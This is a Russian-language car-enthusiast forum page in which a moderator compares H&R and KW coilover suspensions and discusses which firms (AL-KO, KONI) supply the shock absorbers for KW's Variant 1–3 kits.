Показано с 1 по 10 из 83

Тема: H&R или KW?

Древовидный режим

Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Машина
    Skoda
    Цитата Сообщение от deflep Посмотреть сообщение
    Согласен про крутить - скорее всего поставил бы рекомендованные самими KW-шниками характеристики и забыл бы. Именно поэтому думаю, что можно и нужно H&R. И цена (25 тысяч на дороге не валяются) и достойные показатели H&R склоняют к их выбору. Но вчера меня один комрад из Автоспорттюнинга очень настойчиво уговаривал на KW.

Так как я использую авто и в повседневной жизни и для езды на спринты/Мячик, то наверное остановлюсь на H&R. Просто хотелось услышать еще дополнительных авторитетных мнений.

ЗЫЖ Узнал, что оказывается у меня заводские стойки тоже H&R. Вычитал на их сайт, что они именно для Р32 поставляют стойки и пружины.

Добавлено через 2 минуты

В Автоспорттюнинге мне сказали, что именно на KW Var 3 они используют уже амики собственного изготовления.
    AL-KO в подвеске КВ суспенжен. AL-KO поставщик амиков на конвейер европейский некоторых марок, нельзя сказть сразу что все гуано иначе бы с ними никто не заключал контаркты, но и назвать выдающимися нельзя. В КВ суспенжен амики по требованиям инженеров КВ сделаны на мощностях AL-KO, и имеют свои отличия. Недорогое размещение заказа и как мне кажется контроль со стороны КВ позволили выпустить весьма интересный продукт ценой в 400 евро.
    Этой же фирмы амики и в КВ вар. 1, но достаточно взглянуть на него, чтобы понять как сильно он отличается и от обычного суспенжена и от тех, что делает фирма AL-KO на конвейер :)
    КВ небольшая фирма и фзически делать амики нет возможности, это нормальная кооперация по всему миру: ты чертеж - тебе готовый продукт. Вар. 1 проданный мной катается до сих пор уже третий год туеву тучу км, но думаю, что есть и негативные отзывы ..... это касается абсолютно любой фирмы.

Кстати то что пишет КВ про свою технологию Inox Line чистая правда, подвесон до сих пор по зиме, соли и грязи даже нет намека на коррозию, но это превознесено как нечто необычное фирмой КВ, т.к. ранее были проблемы с ржавщиной....... но и другие винты дргих фирм не имеют таких же проблем....... это правильный маркетинг.

и вообще я за разумную трату денег......... это насчет ценнига в 70 штук за подвеску :(

КВ Вар. 2 - внутренности фирмы KONI.............. кстати Кони по той же причине как винты тоже выбор неплохой. Заслуг у Кони не меньше, если не больше чем у других фирм.
    КВ вар. 3 ...... чьи аммики используют фирма скрывает, есть предположение, что и Кони, но также возможно и сами научились, но не обошлось без кого то со стороны это точно. Но как я и говорил, важен чертеж и конструкция правильно сделанная и тесты еще которые КВшники делают и не спустя рукава, а подстраивают под конкретную марку авто, по крайней мере для своих немецких они так делают.
    Последний раз редактировалось BON; 09.12.2009 в 11:39.
    песок сыпется....не останавливайтесь на достигнутом !

Ваши права